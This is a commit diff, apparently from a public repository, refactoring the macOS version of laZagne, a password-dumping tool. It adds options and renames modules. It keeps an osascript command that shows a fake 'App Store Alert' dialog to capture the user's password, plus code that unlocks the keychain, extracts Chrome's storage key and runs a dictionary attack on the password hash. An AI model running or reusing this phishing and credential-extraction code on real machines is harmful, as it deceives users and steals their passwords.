code review

parad0x93 · Mar 26, 2018 · 82c7030 · 82c7030
1 parent 7499a1d
commit 82c7030
Show file tree

Hide file tree

Showing 11 changed files with 678 additions and 839 deletions.
diff --git a/Mac/laZagne.py b/Mac/laZagne.py
@@ -1,3 +1,4 @@
+# -*- coding: utf-8 -*- 
 #!/usr/bin/python
 
 ##############################################################################
@@ -22,10 +23,10 @@
 
 # Configuration
 from lazagne.config.write_output import parseJsonResultToBuffer, print_debug, StandartOutput
-from lazagne.config.manageModules import get_categories, get_modules
+from lazagne.config.manage_modules import get_categories, get_modules
 from lazagne.config.constant import *
 
-# object used to manage the output / write functions (cf write_output file)
+# Object used to manage the output / write functions (cf write_output file)
 constant.st = StandartOutput()
 
 category 	= get_categories()
@@ -45,6 +46,12 @@
 modules['mails']['thunderbird'] = Mozilla(True) # For thunderbird (firefox and thunderbird use the same class)
 
 def output():
+	if args['output']:
+		if os.path.isdir(args['output']):
+			constant.folder_name = args['output']
+		else:
+			print '[!] Specify a directory, not a file !'
+
 	if args['write_normal']:
 		constant.output = 'txt'
 
@@ -58,10 +65,9 @@ def output():
 		if constant.output != 'json':
 			constant.st.write_header()
 
-	# Remove all unecessary variables
-	del args['write_normal']
-	del args['write_json']
-	del args['write_all']
+def quiet_mode():
+	if args['quiet']:
+		constant.quiet_mode = True
 
 def verbosity():
 	# Write on the console + debug file
@@ -99,23 +105,6 @@ def manage_advanced_options():
 	if 'attack' in args:
 		constant.dictionary_attack = args['attack']
 
-	# File used for dictionary attacks
-	if 'path' in args:
-		constant.path = args['path']
-	if 'bruteforce' in args: 
-		constant.bruteforce = args['bruteforce']
-
-	# Mozilla advanced options
-	if 'manually' in args:
-		constant.manually = args['manually']
-	if 'specific_path' in args:
-		constant.specific_path = args['specific_path']
-
-	if 'mails' in args['auditType']:
-		constant.mozilla_software = 'Thunderbird'
-	elif 'browsers' in args['auditType']:
-		constant.mozilla_software = 'Firefox'
-
 def launch_module(module):
 	ok = False
 	modulesToLaunch = []
@@ -125,7 +114,7 @@ def launch_module(module):
 			if args[i] and i in b:
 				modulesToLaunch.append(i)
 	except:
-		# if no args
+		# If no args
 		pass
 
 	# Launch all modules
@@ -138,15 +127,15 @@ def launch_module(module):
 			pwdFound = module[i].run(i.capitalize())				# run the module
 			constant.st.print_output(i.capitalize(), pwdFound) 		# print the results
 
-			# return value - not used but needed 
+			# Return value - not used but needed 
 			yield True, i.capitalize(), pwdFound
 		except:
 			traceback.print_exc()
 			print
 			error_message = traceback.format_exc()
 			yield False, i.capitalize(), error_message
 
-# write output to file (json and txt files)
+# Write output to file (json and txt files)
 def write_in_file(result):
 	if constant.output == 'json' or constant.output == 'all':
 		try:
@@ -184,7 +173,6 @@ def print_user(user):
 	if logging.getLogger().isEnabledFor(logging.INFO) == True:
 		constant.st.print_user(user)
 
-
 def get_safe_storage_key(key):
 	try:
 		for passwords in constant.keychains_pwds:
@@ -200,16 +188,16 @@ def runLaZagne(category_choosed='all', interactive=False):
 	constant.finalResults = {}
 	constant.finalResults['User'] = user
 
-	# could be easily changed
+	# Could be easily changed
 	application = 'App Store'
 
 	i = 0
 	while True:
-		# run all modules
+		# Run all modules
 		for r in runModule(category_choosed):
 			yield r
 
-		# execute once if not interactive, otherwise print the dialog box many times until the user keychain is unlocked (which means that the user passwod has been found) 
+		# Execute once if not interactive, otherwise print the dialog box many times until the user keychain is unlocked (which means that the user passwod has been found) 
 		if not interactive or (interactive and constant.user_keychain_find):
 			break
 
@@ -220,19 +208,19 @@ def runLaZagne(category_choosed='all', interactive=False):
 			else:
 				msg = 'Password incorrect! Please try again.'
 
-			# code inspired from: https://github.com/fuzzynop/FiveOnceInYourLife
+			# Code inspired from: https://github.com/fuzzynop/FiveOnceInYourLife
 			cmd = 'osascript -e \'tell app "{application}" to activate\' -e \'tell app "{application}" to activate\' -e \'tell app "{application}" to display dialog "{msg}" & return & return  default answer "" with icon 1 with hidden answer with title "{application} Alert"\''.format(application=application, msg=msg)
 			pwd = run_cmd(cmd)
 			if pwd.split(':')[1].startswith('OK'):
 				constant.user_password = pwd.split(':')[2].strip()
 
 		i += 1
 
-		# if the user enter 10 bad password, be nice with him and break the loop
+		# If the user enter 10 bad password, be nice with him and break the loop
 		if i > 10:
 			break
 
-	# if keychains has been decrypted, launch again some module
+	# If keychains has been decrypted, launch again some module
 	chrome_key = get_safe_storage_key('Chrome Safe Storage')
 	if chrome_key:
 		for r in launch_module({'chrome': Chrome(safe_storage_key=chrome_key)}):
@@ -249,20 +237,20 @@ def runLaZagne(category_choosed='all', interactive=False):
 	# Version and verbosity 
 	PPoptional = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION))
 	PPoptional._optionals.title = 'optional arguments'
-	PPoptional.add_argument('-i', '--interactive', default=False, action='store_true', help='will prompt a window to the user')
-	PPoptional.add_argument('-password', dest='password', action='store', help='user password used to decrypt the keychain')
-	PPoptional.add_argument('-attack', dest='attack', action='store_true', help='500 well known passwords used to check the user hash (could take a while)')
-	PPoptional.add_argument('-path', dest='path', action='store', help='path of a file used for dictionary file')
-	PPoptional.add_argument('-b', dest='bruteforce', action='store', help='number of character to brute force')
-	PPoptional.add_argument('-v', dest='verbose', action='count', default=0, help='increase verbosity level')
+	PPoptional.add_argument('-i', '--interactive', default=False, action='store_true', 	help='will prompt a window to the user')
+	PPoptional.add_argument('-password', 	dest='password', 	action='store', 		help='user password used to decrypt the keychain')
+	PPoptional.add_argument('-attack', 		dest='attack', 		action='store_true', 	help='500 well known passwords used to check the user hash (could take a while)')
+	PPoptional.add_argument('-v', 			dest='verbose', 	action='count', 		help='increase verbosity level', default=0)
+	PPoptional.add_argument('-quiet', 		dest='quiet', 		action='store_true', 	help='quiet mode: nothing is printed to the output', default=False, )
 
 	# Output 
 	PWrite = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION))
 	PWrite._optionals.title = 'Output'
-	PWrite.add_argument('-oN', dest='write_normal',  action='store_true', help = 'output file in a readable format')
-	PWrite.add_argument('-oJ', dest='write_json',  action='store_true', help = 'output file in a json format')
-	PWrite.add_argument('-oA', dest='write_all',  action='store_true', help = 'output file in all format')
-
+	PWrite.add_argument('-oN',		dest='write_normal',  	action='store_true',	help = 'output file in a readable format')
+	PWrite.add_argument('-oJ', 		dest='write_json',  	action='store_true', 	help = 'output file in a json format')
+	PWrite.add_argument('-oA', 		dest='write_all',  		action='store_true', 	help = 'output file in all format')
+	PWrite.add_argument('-output', 	dest='output', 			action='store', 		help='destination path to store results (default:.)', default='.')
+
 	# ------------------------------------------- Add options and suboptions to all modules -------------------------------------------
 	all_subparser = []
 	for c in category:
@@ -301,12 +289,16 @@ def runLaZagne(category_choosed='all', interactive=False):
 		dic_tmp = {c: {'parents': parser_tab, 'help':'Run %s module' % c, 'func': runModule}}
 		dic = dict(dic.items() + dic_tmp.items())
 
-	#2- Main commands
 	subparsers = parser.add_subparsers(help='Choose a main command')
 	for d in dic:
 		subparsers.add_parser(d,parents=dic[d]['parents'],help=dic[d]['help']).set_defaults(func=dic[d]['func'],auditType=d)
 
 	# ------------------------------------------- Parse arguments -------------------------------------------
+
+	if len(sys.argv) == 1:
+		parser.print_help()
+		sys.exit(1)
+
 	args = dict(parser.parse_args()._get_kwargs())
 	arguments = parser.parse_args()
 	category_choosed = args['auditType']
@@ -316,6 +308,8 @@ def runLaZagne(category_choosed='all', interactive=False):
 	verbosity()
 	manage_advanced_options()
 
+	quiet_mode()
+
 	# Print the title
 	constant.st.first_title()
 
@@ -325,6 +319,4 @@ def runLaZagne(category_choosed='all', interactive=False):
 		pass
 
 	write_in_file(stdoutRes)
-
-	elapsed_time = time.time() - start_time
-	print '\nelapsed time = ' + str(elapsed_time)
+	constant.st.print_footer(elapsed_time=str(time.time() - start_time))
diff --git a/Mac/lazagne/config/constant.py b/Mac/lazagne/config/constant.py
@@ -1,3 +1,6 @@
+# -*- coding: utf-8 -*- 
+#!/usr/bin/python
+
 import time
 
 date = time.strftime("%d%m%Y_%H%M%S")
@@ -6,36 +9,18 @@ class constant():
 	folder_name 		= '.'
 	file_name_results 	= 'credentials_{current_time}'.format(current_time=date) # the extention is added depending on the user output choice
 	MAX_HELP_POSITION 	= 27
-	CURRENT_VERSION 	= '0.2'
+	CURRENT_VERSION 	= '0.2.1'
 	output 				= None
 	file_logger 		= None
 	verbose 			= False
-
-	# mozilla options
-	manually 			= None
-	path 				= None
-	bruteforce 			= None
-	specific_path 		= None
-	mozilla_software 	= ''
-
-	# total password found
-	nbPasswordFound 	= 0
+	nbPasswordFound 	= 0			# total password found
 	passwordFound 		= []
-
-	# password of the keychain
-	keychains_pwd 		= []
-
-	# passwords contain in the keychain
-	keychains_pwds 		= []
-
+	keychains_pwd 		= []		# password of the keychain
+	keychains_pwds 		= []		# passwords contained in the keychain
 	system_pwd 			= []
-
 	finalResults 		= {}
-
-	# standart output
-	st 					= None
-
+	quiet_mode 			= False
+	st 					= None 		# standart output
 	dictionary_attack 	= False
-
 	user_password		= None
 	user_keychain_find 	= False 
diff --git a/Mac/lazagne/config/manageModules.py → Mac/lazagne/config/manage_modules.py b/Mac/lazagne/config/manageModules.py → Mac/lazagne/config/manage_modules.py
@@ -1,3 +1,6 @@
+# -*- coding: utf-8 -*- 
+#!/usr/bin/python
+
 # browsers
 from lazagne.softwares.browsers.mozilla import Mozilla
 from lazagne.softwares.browsers.chrome import Chrome

diff --git a/Mac/lazagne/config/moduleInfo.py → Mac/lazagne/config/module_info.py b/Mac/lazagne/config/moduleInfo.py → Mac/lazagne/config/module_info.py
@@ -12,23 +12,14 @@
 #		options['help'] = 'skype'
 
 class ModuleInfo():
-	def __init__(self, name, category, options, suboptions = []):
-		self.name = name
-		self.category = category
-		self.options = options
+	def __init__(self, name, category, options={}, suboptions=[]):
+		self.name 			= name
+		self.category 		= category		
+		self.options  	 	= {
+			'command' 	: '-{name}'.format(name=self.name), 
+			'action'	: 'store_true', 
+			'dest'		: self.name, 
+			'help'		: '{name} passwords'.format(name=self.name)
+		}
 		self.suboptions = suboptions
-
-	def name(self):
-		return self.name
-
-	def category(self):
-		return self.category
-
-	def options(self):
-		return self.options
-
-	def suboptions(self):
-		return self.suboptions
-
-